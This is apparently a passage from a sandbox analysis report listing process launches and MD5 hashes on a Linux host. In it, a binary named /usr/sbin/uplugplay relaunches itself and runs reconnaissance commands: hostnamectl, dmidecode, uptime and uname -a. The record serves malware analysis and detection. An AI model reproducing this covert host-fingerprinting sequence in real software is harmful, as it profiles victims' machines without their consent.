                  Path:/usr/libexec/fwupd/fwupd
                  Arguments:-
                  File size:260616 bytes
                  MD5 hash:9baeed1d7c56e92aea5277bdf8b4373f

                  Start time (UTC):11:34:00
                  Start date (UTC):31/03/2025
                  Path:/usr/bin/gpg
                  Arguments:gpg --enable-special-filenames --batch --no-sk-comments --homedir /var/lib/fwupd/gnupg --status-fd 24 --no-tty --charset utf8 --enable-progress-filter --exit-on-status-write-error --logger-fd 26 --import -- -&27
                  File size:1066992 bytes
                  MD5 hash:3c2e7402cc788b3a878a1d2bea56afbf

                  Start time (UTC):11:34:01
                  Start date (UTC):31/03/2025
                  Path:/usr/libexec/fwupd/fwupd
                  Arguments:-
                  File size:260616 bytes
                  MD5 hash:9baeed1d7c56e92aea5277bdf8b4373f

                  Start time (UTC):11:34:01
                  Start date (UTC):31/03/2025
                  Path:/usr/bin/gpg
                  Arguments:gpg --enable-special-filenames --batch --no-sk-comments --homedir /var/lib/fwupd/gnupg --status-fd 24 --no-tty --charset utf8 --enable-progress-filter --exit-on-status-write-error --logger-fd 26 --import -- -&27
                  File size:1066992 bytes
                  MD5 hash:3c2e7402cc788b3a878a1d2bea56afbf

                  Start time (UTC):11:34:01
                  Start date (UTC):31/03/2025
                  Path:/usr/libexec/fwupd/fwupd
                  Arguments:-
                  File size:260616 bytes
                  MD5 hash:9baeed1d7c56e92aea5277bdf8b4373f

                  Start time (UTC):11:34:01
                  Start date (UTC):31/03/2025
                  Path:/usr/bin/gpg
                  Arguments:gpg --enable-special-filenames --batch --no-sk-comments --homedir /var/lib/fwupd/gnupg --status-fd 23 --no-tty --charset utf8 --enable-progress-filter --exit-on-status-write-error --logger-fd 25 --verify -- -&26 -&28
                  File size:1066992 bytes
                  MD5 hash:3c2e7402cc788b3a878a1d2bea56afbf

                  Start time (UTC):11:34:03
                  Start date (UTC):31/03/2025
                  Path:/usr/libexec/fwupd/fwupd
                  Arguments:-
                  File size:260616 bytes
                  MD5 hash:9baeed1d7c56e92aea5277bdf8b4373f

                  Start time (UTC):11:34:03
                  Start date (UTC):31/03/2025
                  Path:/usr/bin/gpg
                  Arguments:gpg --enable-special-filenames --batch --no-sk-comments --homedir /var/lib/fwupd/gnupg --status-fd 23 --no-tty --charset utf8 --enable-progress-filter --exit-on-status-write-error --logger-fd 25 --verify -- -&26 -&28
                  File size:1066992 bytes
                  MD5 hash:3c2e7402cc788b3a878a1d2bea56afbf

                  Start time (UTC):11:34:04
                  Start date (UTC):31/03/2025
                  Path:/usr/lib/systemd/systemd
                  Arguments:-
                  File size:1620224 bytes
                  MD5 hash:9b2bec7092a40488108543f9334aab75

                  Start time (UTC):11:34:04
                  Start date (UTC):31/03/2025
                  Path:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                  Arguments:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                  File size:22760 bytes
                  MD5 hash:3633b075f40283ec938a2a6a89671b0e

                  Start time (UTC):11:34:05
                  Start date (UTC):31/03/2025
                  Path:/usr/lib/systemd/systemd
                  Arguments:-
                  File size:1620224 bytes
                  MD5 hash:9b2bec7092a40488108543f9334aab75

                  Start time (UTC):11:34:05
                  Start date (UTC):31/03/2025
                  Path:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                  Arguments:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                  File size:22760 bytes
                  MD5 hash:3633b075f40283ec938a2a6a89671b0e

                  Start time (UTC):11:34:06
                  Start date (UTC):31/03/2025
                  Path:/usr/lib/systemd/systemd
                  Arguments:-
                  File size:1620224 bytes
                  MD5 hash:9b2bec7092a40488108543f9334aab75

                  Start time (UTC):11:34:06
                  Start date (UTC):31/03/2025
                  Path:/usr/sbin/uplugplay
                  Arguments:/usr/sbin/uplugplay
                  File size:435932 bytes
                  MD5 hash:6573a24653020e43e6b1334876e9e365

                  Start time (UTC):11:34:06
                  Start date (UTC):31/03/2025
                  Path:/usr/sbin/uplugplay
                  Arguments:-
                  File size:435932 bytes
                  MD5 hash:6573a24653020e43e6b1334876e9e365

                  Start time (UTC):11:34:06
                  Start date (UTC):31/03/2025
                  Path:/usr/sbin/uplugplay
                  Arguments:-
                  File size:435932 bytes
                  MD5 hash:6573a24653020e43e6b1334876e9e365

                  Start time (UTC):11:34:06
                  Start date (UTC):31/03/2025
                  Path:/bin/sh
                  Arguments:sh -c "/usr/sbin/uplugplay -Dcomsvc"
                  File size:129816 bytes
                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                  Start time (UTC):11:34:06
                  Start date (UTC):31/03/2025
                  Path:/bin/sh
                  Arguments:-
                  File size:129816 bytes
                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                  Start time (UTC):11:34:06
                  Start date (UTC):31/03/2025
                  Path:/usr/sbin/uplugplay
                  Arguments:/usr/sbin/uplugplay -Dcomsvc
                  File size:435932 bytes
                  MD5 hash:6573a24653020e43e6b1334876e9e365

                  Start time (UTC):11:34:07
                  Start date (UTC):31/03/2025
                  Path:/usr/sbin/uplugplay
                  Arguments:-
                  File size:435932 bytes
                  MD5 hash:6573a24653020e43e6b1334876e9e365

                  Start time (UTC):11:34:07
                  Start date (UTC):31/03/2025
                  Path:/bin/sh
                  Arguments:sh -c hostnamectl
                  File size:129816 bytes
                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                  Start time (UTC):11:34:07
                  Start date (UTC):31/03/2025
                  Path:/bin/sh
                  Arguments:-
                  File size:129816 bytes
                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                  Start time (UTC):11:34:07
                  Start date (UTC):31/03/2025
                  Path:/usr/bin/hostnamectl
                  Arguments:hostnamectl
                  File size:26848 bytes
                  MD5 hash:b1245aa6d3c28b5d5fedb2d681d32eb9

                  Start time (UTC):11:34:08
                  Start date (UTC):31/03/2025
                  Path:/usr/sbin/uplugplay
                  Arguments:-
                  File size:435932 bytes
                  MD5 hash:6573a24653020e43e6b1334876e9e365

                  Start time (UTC):11:34:08
                  Start date (UTC):31/03/2025
                  Path:/bin/sh
                  Arguments:sh -c hostnamectl
                  File size:129816 bytes
                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                  Start time (UTC):11:34:08
                  Start date (UTC):31/03/2025
                  Path:/bin/sh
                  Arguments:-
                  File size:129816 bytes
                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                  Start time (UTC):11:34:08
                  Start date (UTC):31/03/2025
                  Path:/usr/bin/hostnamectl
                  Arguments:hostnamectl
                  File size:26848 bytes
                  MD5 hash:b1245aa6d3c28b5d5fedb2d681d32eb9

                  Start time (UTC):11:34:09
                  Start date (UTC):31/03/2025
                  Path:/usr/sbin/uplugplay
                  Arguments:-
                  File size:435932 bytes
                  MD5 hash:6573a24653020e43e6b1334876e9e365

                  Start time (UTC):11:34:09
                  Start date (UTC):31/03/2025
                  Path:/bin/sh
                  Arguments:sh -c "dmidecode --type baseboard"
                  File size:129816 bytes
                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                  Start time (UTC):11:34:10
                  Start date (UTC):31/03/2025
                  Path:/bin/sh
                  Arguments:-
                  File size:129816 bytes
                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                  Start time (UTC):11:34:10
                  Start date (UTC):31/03/2025
                  Path:/usr/sbin/dmidecode
                  Arguments:dmidecode --type baseboard
                  File size:121856 bytes
                  MD5 hash:37284ba29446fb2dadf1ce80f8139c1a

                  Start time (UTC):11:34:10
                  Start date (UTC):31/03/2025
                  Path:/usr/sbin/uplugplay
                  Arguments:-
                  File size:435932 bytes
                  MD5 hash:6573a24653020e43e6b1334876e9e365

                  Start time (UTC):11:34:10
                  Start date (UTC):31/03/2025
                  Path:/bin/sh
                  Arguments:sh -c uptime
                  File size:129816 bytes
                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                  Start time (UTC):11:34:10
                  Start date (UTC):31/03/2025
                  Path:/bin/sh
                  Arguments:-
                  File size:129816 bytes
                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                  Start time (UTC):11:34:10
                  Start date (UTC):31/03/2025
                  Path:/usr/bin/uptime
                  Arguments:uptime
                  File size:14568 bytes
                  MD5 hash:3ad70d8e33316ac713bf25c2ddf2fb14

                  Start time (UTC):11:34:10
                  Start date (UTC):31/03/2025
                  Path:/usr/sbin/uplugplay
                  Arguments:-
                  File size:435932 bytes
                  MD5 hash:6573a24653020e43e6b1334876e9e365

                  Start time (UTC):11:34:10
                  Start date (UTC):31/03/2025
                  Path:/bin/sh
                  Arguments:sh -c "uname -a"
                  File size:129816 bytes
                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                  Start time (UTC):11:34:10
                  Start date (UTC):31/03/2025
                  Path:/bin/sh
                  Arguments:-
                  File size:129816 bytes
                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                  Start time (UTC):11:34:10
                  Start date (UTC):31/03/2025
                  Path:/usr/bin/uname
                  Arguments:uname -a
                  File size:39288 bytes
                  MD5 hash:4ac7c634c5bec95753c480e9d421dcc2

                  Start time (UTC):11:34:10
                  Start date (UTC):31/03/2025
                  Path:/usr/sbin/uplugplay
                  Arguments:-
                  File size:435932 bytes
                  MD5 hash:6573a24653020e43e6b1334876e9e365

                  Start time (UTC):11:34:10
                  Start date (UTC):31/03/2025
                  Path:/bin/sh
                  Arguments:sh -c dmidecode
                  File size:129816 bytes
                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                  Start time (UTC):11:34:10
                  Start date (UTC):31/03/2025
                  Path:/bin/sh
                  Arguments:-
                  File size:129816 bytes
                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                  Start time (UTC):11:34:10
                  Start date (UTC):31/03/2025
                  Path:/usr/sbin/dmidecode
                  Arguments:dmidecode
                  File size:121856 bytes
                  MD5 hash:37284ba29446fb2dadf1ce80f8139c1a

                  Start time (UTC):11:34:14
                  Start date (UTC):31/03/2025
                  Path:/usr/sbin/uplugplay
                  Arguments:-
                  File size:435932 bytes
                  MD5 hash:6573a24653020e43e6b1334876e9e365

                  Start time (UTC):11:34:14
                  Start date (UTC):31/03/2025
                  Path:/bin/sh
                  Arguments:sh -c uptime
                  File size:129816 bytes
                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                  Start time (UTC):11:34:14
                  Start date (UTC):31/03/2025
                  Path:/bin/sh
                  Arguments:-
                  File size:129816 bytes
                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                  Start time (UTC):11:34:14
                  Start date (UTC):31/03/2025
                  Path:/usr/bin/uptime
                  Arguments:uptime
                  File size:14568 bytes
                  MD5 hash:3ad70d8e33316ac713bf25c2ddf2fb14

                  Start time (UTC):11:34:14
                  Start date (UTC):31/03/2025
                  Path:/usr/sbin/uplugplay
                  Arguments:-
                  File size:435932 bytes
                  MD5 hash:6573a24653020e43e6b1334876e9e365

                  Start time (UTC):11:34:14
                  Start date (UTC):31/03/2025
                  Path:/bin/sh
                  Arguments:sh -c "uname -a"
                  File size:129816 bytes
                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                  Start time (UTC):11:34:14
                  Start date (UTC):31/03/2025
                  Path:/bin/sh
                  Arguments:-
                  File size:129816 bytes
                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                  Start time (UTC):11:34:14
                  Start date (UTC):31/03/2025
                  Path:/usr/bin/uname
                  Arguments:uname -a
                  File size:39288 bytes
                  MD5 hash:4ac7c634c5bec95753c480e9d421dcc2

                  Start time (UTC):11:34:09
                  Start date (UTC):31/03/2025
                  Path:/usr/lib/systemd/systemd
                  Arguments:-
                  File size:1620224 bytes
                  MD5 hash:9b2bec7092a40488108543f9334aab75

                  Start time (UTC):11:34:09
                  Start date (UTC):31/03/2025
                  Path:/lib/systemd/systemd-hostnamed
                  Arguments:/lib/systemd/systemd-hostnamed
                  File size:35040 bytes
                  MD5 hash:2cc8a5576629a2d5bd98e49a4b8bef65